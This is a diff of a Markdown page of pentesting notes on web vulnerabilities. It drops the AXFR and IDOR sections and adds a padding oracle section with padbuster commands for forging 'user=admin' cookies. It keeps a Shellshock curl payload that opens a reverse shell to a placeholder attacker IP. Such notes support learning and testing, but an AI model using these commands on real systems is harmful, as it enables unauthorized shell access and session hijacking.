--- a/_posts/notes/vulnerabilities/2022-04-25-others.md
+++ b/_posts/notes/vulnerabilities/2022-04-25-others.md
@@ -3,7 +3,7 @@ title: Notes | Others
 author: Zeropio
 date: 2022-04-25
 categories: [Notes, Vulnerabilities]
-tags: [shellshock, axfr, deserialization, idor]
+tags: [shellshock, poa, deserialization, idor]
 permalink: /notes/vulnerabilities/others
 ---
 
@@ -15,18 +15,6 @@ We can manipulate the **User-agent** to execute it, for example:
 ```console
 > curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/myip/443 0>&1" http://example.com/
 ```
-
----
-
-# Domain Zone Transfer (AXFR)
-AXFR offers no authentication, so any client can ask a DNS server for a copy of the entire zone. This means that unless some kind of protection is introduced, an attacker can get a list of all hosts for a domain, which gives them a lot of potential attack vectors.
-
-If we now one domian we can try:
-```console
-> dig @ip-domian domain.com axfr
-```
-This will list subdomain.
-###### If we only have the ip we can use **/etc/hosts** to create the domains.
 
 ---
 
@@ -51,35 +39,28 @@ We can log in.
 
 ---
 
-# Insecure direct object references (IDOR)
-IDOR are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
+# Padding Oracle Attack
 
-If we have a webpage similar to:
-```
-'https://insecure-website.com/customer_account?customer_number=132355'
-```
-We can modify the value to see the value of others users. Even perform horizontal and vertical privilege escalation to get additional privileges.
+A padding oracle attack is an attack which uses the padding validation of a cryptographic message to decrypt the ciphertext.
 
-Other example if we get a file in the url:
-```
-'https://insecure-website.com/static/12144.txt'
-```
-We can modify the value to get another user's file.
+## Padbuster
+A padding oracle attack is an attack which uses the padding validation of a cryptographic message to decrypt the ciphertext.
 
-# Insecure direct object references (IDOR)
-IDOR are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
+We can use **padbuster** to decode a cookie and try to do a cookie hijacking:
+```console
+$ padbuster [url] 8 -cookie "auth=[cookie]" -encoding 0
+```
 
-If we have a webpage similar to:
+If it is vulnerable, we can encrypt new cookies. For example if the output is 'user=youruser' we can try:
+```console
+$ padbuster [url] 8 -cookie "auth=[cookie]" -encoding 0 -plaintext "user=admin"
 ```
-'https://insecure-website.com/customer_account?customer_number=132355'
-```
-We can modify the value to see the value of others users. Even perform horizontal and vertical privilege escalation to get additional privileges.
 
-Other example if we get a file in the url:
-```
-'https://insecure-website.com/static/12144.txt'
-```
-We can modify the value to get another user's file.
+Another way to recretate this if we can register a new user and login, we can create a user like **admin=**. This will create an user with the same privilegies as the user admin.
+
+## Bit Flipper Attack / BurpSuite
+Another way is to register a new user like **bdmin**. Send the request to the **Intruder**.
+Then we can use the following payload: *type: Bit flipper, Format of original data: Literal value, URL encode: disable*
 
 ---
 
